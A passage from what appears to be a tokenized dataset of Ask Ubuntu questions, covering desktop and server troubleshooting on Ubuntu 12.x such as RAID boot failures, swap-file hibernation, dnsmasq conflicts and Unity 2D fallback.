02 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : raid bus controller product : 82801 sata controller [ raid mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 logical name : scsi2 logical name : scsi4 version : 02 width : 32 bits clock : 66mhz capabilities : storage msi pm bus_master cap_list emulated configuration : latency=0 resources : ioport : b880 ( size=8 ) ioport : b800 ( size=4 ) ioport : b480 ( size=8 ) ioport : b400 ( size=4 ) ioport : b080 ( size=32 ) iomemory : fe8f2000-fe8f27ff irq:47 *-disk:0 unclaimed description : ata disk product : wdc wd5000aaks-0 vendor : western digital physical id : 0 bus info : scsi @ 0:0.0.0 version : 05.0 serial : wd-wcawf2891700 configuration : ansiversion=5 *-disk:1 unclaimed description : ata disk product : wdc wd5000aaks-0 vendor : western digital physical id : 1 bus info : scsi @ 2:0.0.0 version : 05.0 serial : wd-wcawf2839960 configuration : ansiversion=5 *-cdrom unclaimed description : scsi cd-rom product : ihas124 y vendor : atapi physical id : 0.0.0 bus info : scsi @ 4:0.0.0 version : bl0v capabilities : removable configuration : ansiversion=5 *-serial unclaimed description : smbus product : 82801jd/do ( ich10 family ) smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 02 width : 64 bits clock : 33mhz configuration : latency=0 resources : iomemory : fe8f3000-fe8f30ff ioport:400 ( size=32 ) irq:15 *-battery description : nickel cadmium battery product : nikon ultra plus vendor : nikon battery physical id : 1 version : 08/11/97 serial : ni00123 slot : left side of system *-power unclaimed description : to be filled by o.e.m . product : to be filled by o.e.m . vendor : to be filled by o.e.m . physical id : 2 version : to be filled by o.e.m . serial : to be filled by o.e.m . capacity : 32768mwh results.txt boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== ============================ drive/partition info : ============================= no valid partition table found '' blkid '' output : ________________________________________________________________ device uuid type label ================================ mount points : ================================= device mount_point type options /dev/mapper/isw_bhibhcjiba_volume01 / ext4 ( rw , errors=remount-ro , user_xattr ) /dev/shm /run/shm none ( rw , bind ) =============================== stderr messages : =============================== error : mkdir /var/lock/dmraid error : mkdir /var/lock/dmraid error : mkdir /var/lock/dmraid /var/lock/lvm : mkdir failed : no such file or directory file-based locking initialisation failed . mdadm : devices uuid-ad6f745e : e3ae0039:235d131b : a9b94c7c and uuid-ad6f745e : e3ae0039:235d131b : a9b94c7c have the same name : /dev/md/volume0 mdadm : duplicate md device names in conf file were found . cat : /tmp/bootinfo-n8b9zwva/blkid_summary : no such file or directory it had some errors , so i re-ran it from xterm inside the live cd . results.txt boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub legacy ( v0.97 ) is installed in the mbr of /dev/sda and looks on the same drive in partition # 1 for /boot/grub/stage2 and /boot/grub/menu.lst . = > grub legacy ( v0.97 ) is installed in the mbr of /dev/mapper/isw_bhibhcjiba_volume0 and looks on the same drive in partition # 1 for /boot/grub/stage2 and /boot/grub/menu.lst . sda1 : __________________________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' sda2 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' mount : unknown filesystem type '' isw_bhibhcjiba_volume01 : _______________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' isw_bhibhcjiba_volume02 : _______________________________________________________ file system : extended partition boot sector type : unknown boot sector info : isw_bhibhcjiba_volume05 : _______________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 63 937,151,774 937,151,712 83 linux /dev/sda2 937,151,775 976,751,999 39,600,225 5 extended /dev/sda5 937,151,838 976,751,999 39,600,162 82 linux swap / solaris drive : isw_bhibhcjiba_volume0 _____________________________________________________________________ disk /dev/mapper/isw_bhibhcjiba_volume0 : 500.1 gb , 500104826880 bytes 255 heads , 63 sectors/track , 60800 cylinders , total 976767240 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/mapper/isw_bhibhcjiba_volume01 63 937,151,774 937,151,712 83 linux /dev/mapper/isw_bhibhcjiba_volume02 937,151,775 976,751,999 39,600,225 5 extended /dev/mapper/isw_bhibhcjiba_volume05 937,151,838 976,751,999 39,600,162 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/mapper/isw_bhibhcjiba_volume0p1 e18d4cf9-3acc-4d67-92aa-1602b2dba3fb ext4 /dev/mapper/isw_bhibhcjiba_volume0p5 15675782-b581-4ce8-8dd6-419cfb0a30ca swap /dev/sda isw_raid_member /dev/sdb isw_raid_member /dev/sr0 iso9660 ubuntu 12.04.2 lts i386 ========================= `` ls -r /dev/mapper/ '' output : ========================= /dev/mapper : control isw_bhibhcjiba_volume0 isw_bhibhcjiba_volume0p1 isw_bhibhcjiba_volume0p2 isw_bhibhcjiba_volume0p5 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/mapper/isw_bhibhcjiba_volume0p1 /media/e18d4cf9-3acc-4d67-92aa-1602b2dba3fb ext4 ( rw , nosuid , nodev , uhelper=udisks ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda1 unknown bootloader on sda2 unknown bootloader on sda5 unknown bootloader on isw_bhibhcjiba_volume01 unknown bootloader on isw_bhibhcjiba_volume02 unknown bootloader on isw_bhibhcjiba_volume05 =============================== stderr messages : =============================== hexdump : /dev/sda1 : no such file or directory hexdump : /dev/sda1 : no such file or directory hexdump : /dev/sda2 : no such file or directory hexdump : /dev/sda2 : no such file or directory hexdump : /dev/sda5 : no such file or directory hexdump : /dev/sda5 : no such file or directory hexdump : /dev/mapper/isw_bhibhcjiba_volume01 : no such file or directory hexdump : /dev/mapper/isw_bhibhcjiba_volume01 : no such file or directory hexdump : /dev/mapper/isw_bhibhcjiba_volume02 : no such file or directory hexdump : /dev/mapper/isw_bhibhcjiba_volume02 : no such file or directory hexdump : /dev/mapper/isw_bhibhcjiba_volume05 : no such file or directory hexdump : /dev/mapper/isw_bhibhcjiba_volume05 : no such file or directory i 'm still stuck . i still have no idea what to do . hopefully , someone who does will see this and give me a clue .
262232	what event failed ? as far as i can tell everything is mounted as expected and the system boots fine	at boot i get a message mountall : event failed but everything seems to mount fine . with verbose output i see this : / is local /proc is virtual /sys is virtual /sys/fs/fuse/connections is virtual /sys/kernel/debug is virtual /sys/kernel/security is virtual /dev is virtual /dev/pts is virtual /run is virtual /run/lock is virtual /run/shm is virtual /dev/xvda2 is swap /tmp/sessions is virtual mounting event sent for swap /dev/xvda2 mounted event handled for / mount / [ 1355 ] exited normally mount /proc [ 1358 ] exited normally mount /sys [ 1365 ] exited normally mount /sys/fs/fuse/connections [ 1371 ] exited normally mount /sys/kernel/debug [ 1375 ] exited normally mount /sys/kernel/security [ 1378 ] exited normally mount /dev [ 1381 ] exited normally mount /dev/pts [ 1385 ] exited normally mount /run [ 1387 ] exited normally mount /run/lock [ 1388 ] exited normally mount /run/shm [ 1389 ] exited normally mount /tmp/sessions [ 1390 ] exited normally local 1/1 remote 0/0 virtual 0/11 swap 0/1 mounted event handled for /sys local 1/1 remote 0/0 virtual 1/11 swap 0/1 mounted event handled for /sys/fs/fuse/connections local 1/1 remote 0/0 virtual 2/11 swap 0/1 mounted event handled for /sys/kernel/security local 1/1 remote 0/0 virtual 3/11 swap 0/1 mounted event handled for /proc local 1/1 remote 0/0 virtual 4/11 swap 0/1 mounted event handled for /dev/pts local 1/1 remote 0/0 virtual 5/11 swap 0/1 mounted event handled for /run/lock local 1/1 remote 0/0 virtual 6/11 swap 0/1 mounted event handled for /run/shm local 1/1 remote 0/0 virtual 7/11 swap 0/1 mounted event handled for /tmp/sessions local 1/1 remote 0/0 virtual 8/11 swap 0/1 mounted event handled for /sys/kernel/debug local 1/1 remote 0/0 virtual 9/11 swap 0/1 mounted event handled for /dev local 1/1 remote 0/0 virtual 10/11 swap 0/1 mounting event handled for swap /dev/xvda2 activating /dev/xvda2 swapon /dev/xvda2 [ 1391 ] exited normally mountall : event failed mounted event handled for /run virtual finished local finished remote finished all filesystems mounted local 1/1 remote 0/0 virtual 11/11 swap 0/1 mounted event handled for swap /dev/xvda2 swap finished local 1/1 remote 0/0 virtual 11/11 swap 1/1 how can i find out what failed exactly ? output of mount -a mount : sys already mounted or /sys busy mount : according to mtab , sysfs is already mounted on /sys mount : none already mounted or /dev/pts busy mount : according to mtab , devpts is already mounted on /dev/pts
262234	gracefully close appications on shutdown	how to automatically close an application on shutdown ( graceful close , not kill ) ? i try to call wmctrl -c `` app '' in powerbtn.sh , but it does not work . the same wmctrl command works perfectly when typed in terminal or called from a script without superuser rights . why does not it work in powerbtn.sh and how to fix it ?
262236	not able to boot ubuntu 12.04 after installation in windows 7 pc	i tried installing ubuntu 12.04 lts using usb drive . only the uefi port option is shown in the initial boot screen and not the legacy boot . once i select , install along with windows it goes through smoothly and after restart of the machine , the ubuntu option is not present . it boots only the existing windows 7 . not sure what is the reason . could any one of please help on this ? i 'm new to ubuntu .
262238	without having swap partition how to hibernate using only `` swap file ''	i found answer near to this question but not exact answer in ubuntu-forums.i found answer to 1 . how to create swap partition after installing ubuntu . 2 . how to create or add swap file to existing swap partition . but now for this question . since at the time of installation i do n't know the use of swap partition , i installed ubuntu 12.10 without swap partition and i used second method as mentioned in `` http : //www.thegeekstuff.com/2010/08/how-to-add-swap-space/ '' to create swapfile and got this error while using mkswap root @ padmahasa-desktop : ~ # mkswap /root/myswapfile setting up swapspace version 1 , size = 1048572 kib no label , uuid=cc477ba5-e2d9-495c-a63b-300c4e5e0048 and each time uuid differs . but i ignored and continued with next steps and when i tried to hibernate my system i got these errors pm : swap header not found , can not get swap device try swapon -a , can not get swap writer i just want to hibernate my system only using swapfile without creating swap partition .is it possible ? i 'm new to ubuntu . please help me ...
262241	will i get a multiple os boot choice after installing ubuntu with windows 7 ?	i have windows 7 operating off an hdd and am going to install ubuntu on to another seperate hdd . how will i determine the boot options ? through bios by the hdd each time i start , or is there a bit of software that ubuntu installs that allows me to choose which os to boot when i turn the computer on after the bios runs it 's checks ?
262246	unable to extend ubuntu partition size	i 'm trying to increase the size of my ubuntu partition . my partitions , overall , are sort of a mess . i do n't know what the system reserved /sda1 partition is , but i figure that 's something to do with windows 7 and have n't touched it . anywho , i 'm trying to merge the unallocated space with the /dev/sda6 partition , but i ca n't seem to figure out how to do it using gparted . do i have to use the livecd for that ? and if so , do i use the ubuntu livecd or some other disk ? i 'll attach a window-screengrab from gparted running in ubuntu . screengrab : http : //imgur.com/vkdeirb
262248	record live stream	how do i record the live streaming screen with audio in ubuntu 12.04 . i read in some forums about mplayer and vlc player . i tried using download helper , with no luck these are the steps i do http : //shalomtv.tv click and play shalom india , the first tab , live televison i found some similar problems , thought of giving the specific site in this question , for the guidance .
262252	problem with my lenovo g580 laptop	i have purchased lenovo g580 , on 26th january 2013 . i installed windows 7 and ubuntu 12.04lts ( 32bit ) , but in ubuntu it was not detecting the network connection . because of this i wanted to install ubuntu 12.10 lts ( 64bit ) . this time it is not asking for the booting options , directly booting to windows . i consulted a friend and we tried it for three times , and by this time the hard disk was crashed . i contacted the lenovo service center people they changed the hard disk and tried the same installation procedure , it was also a failure . finally they installed only windows 7 gave back it to me . so my request you to advise me that what i have to do to solve this problem , i dont know whether it is the problem with the laptop ( lenovo g580 ) or anything else . please give me some solutions . sumesh
262253	how do i take a screenshot with dimensions ?	i need to capture hundreds of screenshots , each the same size . is there an application that would allow me to capture a portion of my screen with fixed dimensions ? for example , i would like the fixed region to appear as soon as i press the screenshot button then capture it when i left click . i am currently using the default screenshot app that comes with ubuntu 12.10 and the feature to capture an area works for me but not knowing what the dimensions are is an issue .
262261	building ubuntu server from source on very old hardware ?	i 'd like to build ubuntu lts 12.04 from source ( kernel+daemons ) on very old hardware . the hardware i 'm on is i486 cpu on a pc104 single board computer . most live cd 's have trouble getting further than just booting on the computer . it has 512mb ram but less than 512mb hardrive space and very slow cpu . i ca n't get the ubuntu minimal cd to get past just booting . so i 'm trying out this cd next http : //www.ubuntu-mini-remix.org/ . if i ca n't get a really small and stable ubuntu to run on this , then i 'm going to try gentoo next . i want to install a tiny ubuntu on this old hardware , i 've done lots of googling but have n't found much . tinycore linux works good on this hardware though ( microcore to be exact ) . i just want a very tiny ubuntu ( without xorg+de ) to work on extremely this old hardware . is there some way i can install ubuntu from another linux 's live cd ? i know you can do this on gentoo . what are your recommendations for installing a tiny very basic ubuntu/linux based server distro on very old hardware ?
262263	damaged update software	i 've seen some other topics with similar issues , but being a 'bit ' of an ubuntu newb , i wanted to address my concrete problem , to solve this properly , because i 'm not sure do some other solutions apply in my case . here it goes , my update manager started working , and surfing on the internet , i completely forgot it was turned on . i could n't access some sites due to flash player being updated , but as i 've forgot that updates were ongoing ( flash included ) , i thought i had to do it manually . so i went to this site : http : //www.linux.org/article/view/install-adobe-flash-reader-air-in-ubuntu-12-04-precise-pangolin- i 've entered these two codes : sudo apt-add-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' sudo apt-get update & & sudo apt-get install flashplugin-installer acroread then i noticed my update manager working , alas too late . it froze in its process , so i logged off , and logged in , entering the update manager again . it asked me to do a partial upgrade , i accepted , and since then when i click `` check for updates '' i receive a warning with following details : w : failed to fetch http : //archive.canonical.com/dists/ & ( lsb_release/-sc ) /source/sources 404 not found [ ip : 91.189.92.150 80 ] , w : failed to fetch http : //archive.canonical.com/dists/ & ( lsb_release/partner/source/sources 404 not found [ ip : 91.189.92.150 80 ] , w : failed to fetch http : //archive.canonical.com/dists/ & ( lsb_release/-sc ) /binary-i386/packages 404 not found [ ip : 91.189.92.150 80 ] , w : failed to fetch http : //archive.canonical.com/dists/ & ( lsb_release/partner/binary-i386/packages 404 not found [ ip : 91.189.92.150 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . can anybody help me with some step-by-step instructions for ubuntu dummies to solve this ? : ) to save what left of my virtual dignity , i 'm guessing i need to reset those repository-source-code-thingies for flash , to set it to default , but i do n't know how to do that , or is that the solution in the first place . edit : i went to update manager settings and unchecked updates from independent sources , that made the warning not to appear . i 'm not sure will it affect some of my other applications .
262264	sharing internet between mac mini ( with ubuntu ) and android	i have an old mac mini on which i installed ubuntu . it works quite fine except for few issues . one of the issues is as follows : i used this mac mini as a hot-spot for sharing ethernet - > wi-fi connection . i have the mac connected to standard ethernet , i used to start a hotspot and i have android tablet , phone and kindle connect to that ( and therefore to the internet ) . however , since i switched to ubuntu , it does n't work . my ethernet connection 100 % works . my wi-fi 100 % works as on itself in both ubuntu and os x . sharing connection works in os x , but not in ubuntu . when i go to the network settings , select wireless , select `` use as hotspot '' , it generates a random wep password ( without any possibility to change it or turn it off , but ok ) , i see the wifi on my tablets , but if i want to connect to the wifi , it gets stuck on `` getting ip address '' on the android . so android sees the network , but ca n't connect to it . the same with non-android wifi enabled toys . what should i do ? i just want to share the connection to all my wifi enabled toys . and it works great if i reboot to os x. i do n't understand ifconfig and routing tables that much , so i am little afraid of that , but if it 's needed i will go there and edit something/run some scripts . i do n't care , i just want to share the damned connection .
262271	in a maas/juju setup , is it possible to deploy multiple charms ( eg . mysql and wordpress ) on one single maas node ?	well the headline basically says it all . i have a small testing environment running , and this question pops up . not all charms need a whole node for them selves . is it possible for me to deploy both mysql and wordpress charm on one machine ? if yes , how do i do that . and yes , i have been looking around and also found something called subordinate services which could look like a solution to that , but i am not sure and defiantly not sure how to set that up.. anyone who can help me here ?
262273	unable to format external hard disk	i have an external wd my passport connected via usb 2.0 . yesterday i have tried to format it using disk utility but somehow it could not complete successfully . now its showing unknown volume 0.0kb . i am not able to format it anyhow . i have tried many things and also have googled . somehow i have come to know about mkfs command , but it shows some unable to reread partition table error . i have also tried $ dmesg | grep scsi and i got following information : $ dmesg | grep scsi [ 2.405840 ] scsi0 : ata_piix [ 2.405946 ] scsi1 : ata_piix [ 2.594257 ] scsi 1:0:0:0 : cd-rom necvmwar vmware ide cdr10 1.00 pq : 0 ansi : 5 [ 2.594720 ] sr0 : scsi3-mmc drive : 1x/1x writer dvd-ram cd/rw xa/form2 cdda tray [ 2.594895 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 2.595054 ] sr 1:0:0:0 : attached scsi generic sg0 type 5 [ 2.892569 ] scsi2 : ioc0 : lsi53c1030 b0 , fwrev=01032920h , ports=1 , maxq=128 , irq=17 [ 3.012719 ] scsi 2:0:0:0 : direct-access vmware , vmware virtual s 1.0 pq : 0 ansi : 2 [ 3.012727 ] scsi target2:0:0 : beginning domain validation [ 3.013261 ] scsi target2:0:0 : domain validation skipping write tests [ 3.013263 ] scsi target2:0:0 : ending domain validation [ 3.013288 ] scsi target2:0:0 : fast-40 wide scsi 80.0 mb/s st ( 25 ns , offset 127 ) [ 3.014889 ] sd 2:0:0:0 : attached scsi generic sg1 type 0 [ 49.346171 ] scsi3 : usb-storage 1-1:1.0 [ 50.355834 ] scsi 3:0:0:0 : direct-access wd my passport 0740 1003 pq : 0 ansi : 6 [ 50.363324 ] scsi 3:0:0:1 : enclosure wd ses device 1003 pq : 0 ansi : 6 [ 50.365120 ] sd 3:0:0:0 : attached scsi generic sg2 type 0 [ 50.366874 ] scsi 3:0:0:1 : attached scsi generic sg3 type 13 [ 243.458257 ] scsi4 : usb-storage 1-1:1.0 [ 244.526476 ] scsi 4:0:0:0 : direct-access wd my passport 0740 1003 pq : 0 ansi : 6 [ 244.573385 ] scsi 4:0:0:1 : enclosure wd ses device 1003 pq : 0 ansi : 6 [ 244.574217 ] sd 4:0:0:0 : attached scsi generic sg2 type 0 [ 244.574412 ] scsi 4:0:0:1 : attached scsi generic sg3 type 13 [ 252.713434 ] scsi 4:0:0:1 : failed to get diagnostic page 0x8000002 [ 252.713437 ] scsi 4:0:0:1 : failed to bind enclosure -19 and sometimes my harddisk does not get detected . i am worried . is there anyone who can help me ? thanks in advance .
262274	how to separate a given type of file from others ?	i have a folder containing about 6000 .pdf , .jpg , .doc and .djvu files out of which i want to separate all the .djvu files and move them to another new folder . i was wondering if there is a quicker way to do so than handpicking .
262276	how to bulk convert .djvu files to .pdf ?	i have about 200 .djvu ebooks which i want to convert into .pdf . since one-by-one conversion is tiresome i want to know if there is a way to convert them all at once . any help will be appreciated .
262277	nexus 7 - adbd can not run as root in production builds ( ubuntu touch install )	i do n't know what to do next.. a few days ago i accidentally installed ubuntu 13.04 and restored it back to android . after that i installed ubuntu touch with this guide and i followed every step ! https : //wiki.ubuntu.com/touch/install it worked , but the ubuntu touch was something like a demo - > back to android again . i rooted android . today : i wanted to install ubuntu touch again with phablet-flash -l for a daily non-demo build - > adbd can not run as root in production builds then i thought , maybe because it 's rooted - > i reinstalled the factory image 4.2.2 , locked the device , unlocked it again - > the same error . what 's the problem here ? my setup : a fresh installed ubuntu 12.10 with vmware tools on vmware player like i did it the first time . this question did n't help . galaxy nexus-adbd can not run as root in production builds
262279	how do i open a pdf file in a virtual console ?	i want to open pdf files from within the virtual console and view them in the console itself . are there any applications that allow that ?
262280	gnome-shell disable overview thumbnails	is there a way how to disable the thumbnails in gnome-shell overview ? it makes my pc lag and is ( for me ) useless ... something like disabling the windows tab and always selecting the applcations one . i 'm at 12.04 , gnome-shell 3.4
262287	synaptic touchpad on laptop not working	i 'm using a laptop with built-in touchpad that 's working in windows 7 . but after i switched to ubuntu 12.04 lts , it seems to not working now . any solutions ?
262289	ssl only specify website	i already made a ssl certificate for my server , but can i use the ssl only for specific website . for example inside /var/www i have a lot web folder and i want the `` a '' website used https and the others not used https . how to setup ?
262293	do i need to install `` swift '' to make charms work ?	i want to deploy charms . i tried glance on jujucharms.com for example . in section requires > > several different components are listed . if i do n't need swift do i have to install it ? would this charm work without swift ?
262298	install lamp and zend framework on server version ( ec2 )	does anyone have a good step-by-step guide to setting up a server version of ubuntu as a lamp server ? preferably with zend framework installed ? i have been working on a local workstation with the desktop version of ubuntu , and have setup amp and zend framework a few times . now i 'm ready to push a beta live and i 've got myself an aws account with an ec2 server . domain names are routing there . i know that the process for setting up the server version of ubuntu will be much the same as setting up the desktop version , but since the terminal is not second nature to me , i thought i 'd ask this question in the interests of eliminating one of the hurdles . also , i do n't have a lot of time to do it in ... thanks !
262301	is dnsmasq not loading because of a network manager conflict ?	i 'm on 12.10 , and have always used dnsmasq . a few days ago i noticed strange messages during boot : networkmanager [ 1316 ] : < warn > dns : plugin dnsmasq update failed dnsmasq [ 1302 ] : failed to create listening socket for 127.0.0.1 : address already in use dnsmasq [ 1302 ] : failed to start up networkmanager [ 1316 ] : < info > dns : starting dnsmasq ... networkmanager [ 1316 ] : < error > [ 1362028900.869958 ] [ nm-dns-dnsmasq.c:390 ] update ( ) : dnsmasq not available on the bus , ca n't update servers . networkmanager [ 1316 ] : < error > [ 1362028900.869979 ] [ nm-dns-dnsmasq.c:392 ] update ( ) : dnsmasq owner not found on bus : could not get owner of name 'org.freedesktop.networkmanager.dnsmasq ' : no such name networkmanager [ 1316 ] : < warn > dns : plugin dnsmasq update failed dnsmasq [ 1876 ] : warning : no upstream servers configured here is my /etc/dnsmasq.conf : http : //pastebin.com/ankrrg6k here is my /etc/dnsmasq.d/network-manager : # tell any system-wide dnsmasq instance to make sure to bind to interfaces # instead of listening on 0.0.0.0 # warning : changes to this file will get lost if network-manager is removed . bind-interfaces if further information is needed , please ask !
262303	creating exact root user in ubuntu 12.04	how can i create an user which will act same as root . when i login , it should go to # shell instead of $ . there must be no need to apply sudo before any command . when i connect through graphical ssh all folders in /home should be accessible whether the have 700 permission . this all happen with root only by default . i want to create another account which should be able to do like root .
262304	my weather indicator 404 error	i have just got up this morning and noticed my-weather-indicator is not working . when i run it from the terminal i get : < gettext.gnutranslations instance at 0x2eebef0 > no lsb modules are available . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise version : x86_64 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # my-weather-indicator version : 0.6.1.2.precise.1 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ( '/home/chrispche/.config/my-weather-indicator/my-weather-indicator.conf ' , true ) { `` time '' : '' 2013-02-28 11:19 '' , '' countryname '' : '' united kingdom '' , '' sunset '' : '' 2013-02-28 17:35 '' , '' rawoffset '' :0 , '' dstoffset '' :1 , '' countrycode '' : '' gb '' , '' gmtoffset '' :0 , '' lng '' :0.7 , '' sunrise '' : '' 2013-02-28 06:45 '' , '' timezoneid '' : '' europe/london '' , '' lat '' :51.5333 } searching url : http : //where.yahooapis.com/geocode ? q=51.5333 , +0.7 & gflags=r & flags=j & appid=_sln0ohv34exg09kl5easmbgbs5y3gjes1n.oon0wd5lnh6e5hgdtqmx_mdxpoxkazfts1db0yni_nztpwakfxem gid http error 404 : not found < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < response > < ip > 92.232.83.84 < /ip > < status > ok < /status > < countrycode > gb < /countrycode > < countrycode3 > gbr < /countrycode3 > < countryname > united kingdom < /countryname > < regioncode > m5 < /regioncode > < regionname > southend-on-sea < /regionname > < city > southend-on-sea < /city > < zippostalcode > ss2 < /zippostalcode > < latitude > 51.5333 < /latitude > < longitude > 0.7000 < /longitude > < areacode > 0 < /areacode > < timezone > europe/london < /timezone > < /response > yahoo weather service , not found woeid traceback ( most recent call last ) : file `` /opt/extras.ubuntu.com/my-weather-indicator/bin/my-weather-indicator '' , line 46 , in < module > mwi=mwi ( ) file `` /opt/extras.ubuntu.com/my-weather-indicator/share/my-weather-indicator/myweatherindicator.py '' , line 136 , in __init__ self.load_preferences ( ) file `` /opt/extras.ubuntu.com/my-weather-indicator/share/my-weather-indicator/myweatherindicator.py '' , line 363 , in load_preferences self.work ( ) file `` /opt/extras.ubuntu.com/my-weather-indicator/share/my-weather-indicator/myweatherindicator.py '' , line 196 , in work self.set_menu ( ) file `` /opt/extras.ubuntu.com/my-weather-indicator/share/my-weather-indicator/myweatherindicator.py '' , line 465 , in set_menu temporal_current_conditions = weather [ 'current_conditions ' ] typeerror : 'nonetype ' object has no attribute '__getitem__' does anyone have any ideas why switching my computer off last night with everything working , i should suddenly get this when i turn it on this morning again .
262306	what is a tainted binary package ?	using dpkg i created some debian packages containing self-written libraries that install without problems . but when i try to run lintian on one of them , i just get the following error : warning : tainted binary package 'name of package ' , skipping what does tainted binary package mean ? i can not find a description for this error anywhere .
262307	make active programs appear on top of launcher	assume we have a program that is not locked to the launcher . we can change the location of the program while it is active but that location will be forgotten after restarting the program . i think it would be convenient to have all active programs appear at the top of the launch bar , above the programs that are locked to the launcher but are inactive at the moment . how can we do this ?
262310	install libreoffice 4.0.1	i 'm using ubuntu 12.10 , and i 'm trying to install libre office 4.0.1 but cant find anything about who to install it after you have downloaded the file . how do you install the tar.gz file after the download ?
262311	ubuntu 12.04 mount shared folders when domain password changes periodically	we have a windows ( active directory ) domain at work . we want to replace some workstations with ubuntu . i have now an ubuntu 12.04 with likewise open and i am trying to make it work with the domain . i am able to join the domain using my domain credentials . what i want to do is to be able to mount the public folders . i am familiar with mounting via cifs and it is working fine . my problem is that the group policy requires the workstations to change their passwords once a month . can i find a permanent way of mounting the shared without having to update the mount command every time the password changes ?
262313	opening .docx attachments in firefox using libreoffice	i 'm trying to open .docx files from the outlook web app , viewed in firefox , with libreoffice . libreoffice is installed on my computer and the default application for opening .docx files . what 's more , in the preferences- > applications of firefox , i see libreoffice writer as the default for microsoft word files and do n't see any other entry for .docx files . but when i click on an attached .docx file , firefox asks me whether to download it or open it with gedit . if i manually choose lowriter from this dialog , firefox does n't remember this choice and let me pick it afterward . update : i noticed something strange - it seems like this does n't happen for all .docx files , but rather for files whose name starts with a number ( for example , 1234.docx ) . files with alphabetical prefixes are opened fine by firefox ( for example , abcd.docx ) . any ideas ? i 'd love to be able to open these files in one click , instead of downloading them and only then opening them in writer .
262320	after ubuntu 12.04 lts update , only unity 2d ... bug ?	i have no clue why this happened , but i would really like to fix it . i ran a bunch of updates ( 25+ ... i had n't updated in a while ) and for some reason after i restarted to install the updates , i could only log in using unity 2d ( ubuntu 2d ) and gnome classic ( no effects . ) i could select the options on the login screen for unity 3d ( ubuntu ) and gnome 3 , but they have no effect , it just reverts to 2d and classic.. ? ? my computer is a toshiba satellite a105 s4284 with an intel centrino duo chip . here is some info i gathered that might help : this command : lspci -nnk | grep -a3 vga gave this output : 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller [ 8086:27a2 ] ( rev 03 ) subsystem : toshiba america info systems device [ 1179 : ff10 ] kernel modules : intelfb , i915 00:02.1 display controller [ 0380 ] : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller [ 8086:27a6 ] ( rev 03 ) i ran unity -- version and it said unity 5.18.0 any other things that would help solve this problem ? uname -r provided this info : 3.2.0-38-generic edit 2/28/2013 - 9:49pm : ( updated info ^ ) after using the commands described by fossfreedom i can now use the /usr/lib/nux/unity_support_test -p command again ? ? ? anyways , here is the output : nate @ texno-satellite-a105 : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) opengl version string : 2.1 mesa 9.2-devel ( git-533dc3b precise-oibaf-ppa ) not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no edit 3/1/2013 - 8:53am : ( more info ) here is the output of lspci | grep vga ; lsmod | grep `` kms\|drm '' ; find /dev -group video ; \ cat /proc/cmdline ; find /etc/modprobe.d/ ; cat /etc/modprobe.d/kms ; \ ls /etc/x11/xorg.conf ; glxinfo | grep -i `` vendor\|rendering '' ; \ grep loadmodule /var/log/xorg.0.log 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) drm_kms_helper 45466 1 i915 drm 197641 2 i915 , drm_kms_helper /dev/fb0 /dev/dri/card0 /dev/agpgart boot_image=/boot/vmlinuz-3.2.0-38-generic root=uuid=be971ef2-bac7-468b-826c-32c5f9f179cc ro quiet splash nomodeset video=uvesafb : mode_option=1280x800 , mtrr=3 , scroll=ywrap vt.handoff=7 /etc/modprobe.d/ /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/oss-compat.conf /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/vmwgfx-fbdev.conf /etc/modprobe.d/blacklist-watchdog.conf /etc/modprobe.d/dkms.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-modem.conf # modprobe information used for dkms modules # # this is a 